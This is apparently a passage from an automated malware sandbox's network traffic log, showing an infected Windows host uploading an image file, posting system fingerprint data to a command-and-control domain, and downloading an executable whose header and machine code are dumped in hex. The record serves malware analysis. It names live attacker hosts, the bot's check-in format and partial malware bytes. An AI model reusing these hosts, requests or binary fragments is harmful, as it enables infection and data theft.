Aug 23, 2021 02:09:00.420262098 CEST	15707	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 30 62 30 65 62 33 64 35 32 33 33 30 30 33 30 66 36 62 62 36 37 62 33 62 65 65 33 30 36 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------40b0eb3d52330030f6bb67b3bee306cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:00.420304060 CEST	15717	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:00.421109915 CEST	15720	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:00.481296062 CEST	15723	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:00.481487036 CEST	15725	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:00.481544971 CEST	15726	OUT	Data Raw: 46 ed b9 97 9a 3c 88 b1 8d b5 c9 2c 34 9c 9b 4f bf f5 f7 b6 ce a8 e2 12 8d 9a fe bf e1 b4 3a cd 4a c3 48 d3 f4 dd 6e e1 b4 a4 5b a8 be c3 19 82 49 a5 22 c6 59 92 43 2a f0 c0 92 a5 47 0c 49 04 60 e7 04 1b de 23 d3 3f b2 fc 25 af 41 0e 88 d6 16 ab Data Ascii: F<,4O:JHn[I"YC*GI`#?%A%r61pm8Zp%?lJu9FP[wk{{A0f,cIw$tk[\<EX<F`0\q,\z<4?1G[5G,l
Aug 23, 2021 02:09:00.481558084 CEST	15727	OUT	Data Raw: 52 18 52 52 d2 52 18 94 94 e3 4d 34 31 85 14 51 48 04 a2 96 83 40 c4 a2 93 bd 2d 20 12 96 8a 28 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a2 80 16 8a 28 a6 20 a2 8e d4 50 01 45 14 53 00 a2 8a 29 00 52 52 d0 69 00 94 51 45 03 10 d2 52 e2 92 81 8a 69 28 a2 Data Ascii: RRRRM41QH@- (((( PES)RRiQERi((((QI@EPAKEQE(RZ.+$ce(y#s]%;NGp+MU;c)'BI{&5)^1yTSQ\vY
Aug 23, 2021 02:09:00.481806040 CEST	15729	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:00.482060909 CEST	15730	OUT	Data Raw: 64 35 f2 cf 8b 7f e4 73 d7 7f ec 21 71 ff 00 a3 1a bd 9c 87 f8 93 f4 38 73 1f 86 26 3d 14 77 a0 57 d3 1e 48 b4 60 51 45 02 13 68 af 6a f8 0a 65 8f 4e f1 73 db e4 cc b1 40 63 da b9 3b b1 36 30 3b f3 5e 39 69 6e 6e ae 52 10 db 4b 67 9c 7b 66 bd 13 Data Ascii: d5s!q8s&=wWH`QEhjeNs@c;60;^9innRKg{fz nyPcwR*<rZ0{mR;JM_S^qk)v/]b1?Oy.2QvK<OO4VcrF GL>
Aug 23, 2021 02:09:00.482187033 CEST	15732	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:01.717005968 CEST	15829	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.3	49776	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.557205915 CEST	15748	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:00.583091974 CEST	15749	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.583159924 CEST	15749	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49715	193.142.59.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:02.491183996 CEST	1640	OUT	GET /forum/docs/sefile.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 193.142.59.123
Aug 23, 2021 02:08:02.523536921 CEST	1654	IN	HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 00:08:02 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Mon, 23 Aug 2021 00:00:02 GMT ETag: "4d600-5ca2eb2ea91e3" Accept-Ranges: bytes Content-Length: 316928 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 43 a9 49 62 07 c8 27 31 07 c8 27 31 07 c8 27 31 19 9a b2 31 16 c8 27 31 19 9a a4 31 6a c8 27 31 19 9a a3 31 31 c8 27 31 20 0e 5c 31 02 c8 27 31 07 c8 26 31 95 c8 27 31 19 9a ad 31 06 c8 27 31 19 9a b3 31 06 c8 27 31 19 9a b6 31 06 c8 27 31 52 69 63 68 07 c8 27 31 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f bd 47 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 01 00 00 98 fa 01 00 00 00 00 e0 22 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 fb 01 00 04 00 00 ac a3 05 00 03 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6f 02 00 3c 00 00 00 00 30 fb 01 60 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f2 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 65 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 dc 01 00 00 10 00 00 00 de 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 8b 00 00 00 f0 01 00 00 8c 00 00 00 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 ac f8 01 00 80 02 00 00 32 02 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 35 00 00 00 30 fb 01 00 36 00 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CIb'1'1'11'11j'111'1 \1'1&1'11'11'11'1Rich'1PELG_"@p0o<0`5`e@.text0 `.rdata*@@.data2n@.rsrc`506@@
Aug 23, 2021 02:08:02.523566961 CEST	1656	IN	Data Raw: 00 8b ff 55 8b ec 83 ec 40 83 7d 0c 00 75 1c 83 7d 10 00 76 16 83 7d 08 00 74 09 8b 45 08 c7 00 00 00 00 00 33 c0 e9 d1 02 00 00 83 7d 08 00 74 09 8b 4d 08 c7 01 ff ff ff ff ba ff ff ff 7f 3b 55 10 1b c0 83 c0 01 89 45 ec 75 1e 68 58 f3 41 00 6a Data Ascii: U@}u}v}tE3}tM;UEuhXAjjJhAjp;u}u0:jjJhAhAhXAn8\URMUM]xM~C}t}vURjEP7:*
Aug 23, 2021 02:08:02.523587942 CEST	1657	IN	Data Raw: 8b 55 08 83 7a 04 00 74 4c 8b 45 08 8b 48 04 51 e8 c2 5a 00 00 83 c4 04 83 c0 01 89 45 fc 8b 55 fc 52 e8 10 01 00 00 83 c4 04 8b 4d f8 89 41 04 8b 55 f8 83 7a 04 00 74 1a 8b 45 08 8b 48 04 51 8b 55 fc 52 8b 45 f8 8b 48 04 51 e8 a7 57 00 00 83 c4 Data Ascii: UztLEHQZEURMAUztEHQUREHQWUBEMQPE]UQMEAMytUBPy]UQMExtMAA]UjjEP~Z]
Aug 23, 2021 02:08:02.523611069 CEST	1658	IN	Data Raw: 00 33 d2 81 e2 ff 00 00 00 89 55 c8 8b 45 f8 8b 08 83 c1 01 8b 55 f8 89 0a eb 11 8b 45 f8 50 6a 00 e8 77 69 00 00 83 c4 08 89 45 c8 83 7d c8 ff 74 56 8b 4d f8 8b 51 04 83 ea 01 8b 45 f8 89 50 04 8b 4d f8 83 79 04 00 7c 22 8b 55 f8 8b 02 c6 00 00 Data Ascii: 3UEUEPjwiE}tVMQEPMy\|"U3MUMURj&iE}tE 3MUfDJEx}]UEPMQUREPMQh@E}}EUUE
Aug 23, 2021 02:08:02.523636103 CEST	1660	IN	Data Raw: f8 01 75 01 cc 83 7d d8 00 75 2e e8 b3 2b 00 00 c7 00 16 00 00 00 6a 00 6a 36 68 60 f5 41 00 68 4c f5 41 00 68 a4 f4 41 00 e8 25 29 00 00 83 c4 14 83 c8 ff e9 8c 00 00 00 8d 55 0c 89 55 e4 e8 ef 8a 00 00 83 c0 20 50 6a 01 e8 d4 8c 00 00 83 c4 08 Data Ascii: u}u.+jj6h`AhLAhA%)UU PjE PEEPjMQ PnE PURE PjEMdY_^[]UB39
Aug 23, 2021 02:08:02.523658991 CEST	1661	IN	Data Raw: 6c ae 44 00 01 75 05 e8 6d b2 00 00 8b 45 08 50 e8 b4 b2 00 00 83 c4 04 68 ff 00 00 00 e8 87 5b 00 00 83 c4 04 5d c3 cc cc 8b ff 55 8b ec 83 ec 08 c7 45 fc 00 00 40 00 83 7d fc 00 74 0e 8b 45 fc 0f b7 08 81 f9 4d 5a 00 00 74 04 33 c0 eb 49 8b 55 Data Ascii: lDumEPh[]UE@}tEMZt3IUEB<EM9PEt3.UB=t3Mytw3U3]UQEPMQURDPMQEE]UEEPMQU
Aug 23, 2021 02:08:02.523682117 CEST	1662	IN	Data Raw: 04 e8 39 9b 00 00 83 c4 04 c3 8b 45 e0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 08 83 7d 08 00 76 6b b8 e0 ff ff ff 33 d2 f7 75 08 3b 45 0c 1b c0 83 c0 01 89 45 f8 75 21 68 bc f8 41 00 6a 00 68 48 02 00 00 68 10 Data Ascii: 9EMdY_^[]U}vk3u;EEu!hAjhHhAjS!u}u- jhHhAhAhAN3KUUUEPMQUREPDQUR=E}tEPjMQrE]U
Aug 23, 2021 02:08:02.523714066 CEST	1664	IN	Data Raw: 6a 01 e8 2e ad 00 00 83 c4 18 83 f8 01 75 01 cc e8 00 1c 00 00 c7 00 16 00 00 00 33 c0 e9 88 02 00 00 83 7d 1c 00 74 25 8b 55 fc 83 c2 24 52 8b 45 f4 50 e8 6d b4 00 00 83 c4 08 89 45 f0 83 7d f0 00 75 07 33 c0 e9 5f 02 00 00 eb 23 8b 4d fc 83 c1 Data Ascii: j.u3}t%U$REPmE}u3_#M$QURxE}u3:3u0B0B}u\|=pDs9UpD+BpD+pD;MvpDUpDpDED+HDDUDD;
Aug 23, 2021 02:08:02.523736954 CEST	1665	IN	Data Raw: f7 41 00 50 68 10 ff 41 00 6a 00 6a 00 6a 00 6a 01 e8 e5 a7 00 00 83 c4 28 83 f8 01 75 01 cc eb 3c 8b 55 fc 83 c2 20 52 8b 45 fc 8b 48 18 51 8b 55 fc 8b 42 14 25 ff ff 00 00 8b 0c 85 3c f7 41 00 51 68 80 fe 41 00 6a 00 6a 00 6a 00 6a 01 e8 a7 a7 Data Ascii: APhAjjjj(u<U REHQUB%<AQhAjjjj uj8BPMQEL QQUztMEHQUBPM QUBPMQ<APhAjjjj+(u<U REHQUB%
Aug 23, 2021 02:08:02.523761034 CEST	1667	IN	Data Raw: e4 87 42 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 a1 28 80 42 00 83 e0 01 75 0a b8 01 00 00 00 e9 ed 03 00 00 6a 04 e8 23 8b 00 00 83 c4 04 c7 45 fc 00 00 00 00 e8 c4 ae 00 00 89 45 e0 83 7d e0 ff 0f 84 e4 00 00 00 83 7d e0 fe 0f 84 da 00 Data Ascii: B1E3PEd(Buj#EE}}MMUU}E$=@hxBhAjjjj3uhTBhAjjjjudh0BhAjjjjuBhBhAjjjj
Aug 23, 2021 02:08:02.554697037 CEST	1671	IN	Data Raw: f8 10 25 ff ff 00 00 a3 90 ae 44 00 c7 05 78 ae 44 00 00 00 00 00 8b 4d 08 89 0d 28 80 42 00 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 0b 6a 04 e8 23 86 00 00 83 c4 04 c3 8b 45 e4 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc Data Ascii: %DxDM(BEj#EMdY_^[]U3}]UQ}u3jj E Pu3h=;uIM Q]E}tU REP2M QjDRAE Pj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.3	49775	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.706228971 CEST	15777	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: atvcampingtrips.com
Aug 23, 2021 02:09:00.706336975 CEST	15777	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 66 03 ab af Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vufCzNGq(o.`sTm[vZJ
Aug 23, 2021 02:09:01.935607910 CEST	15832	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:01 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.3	49777	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
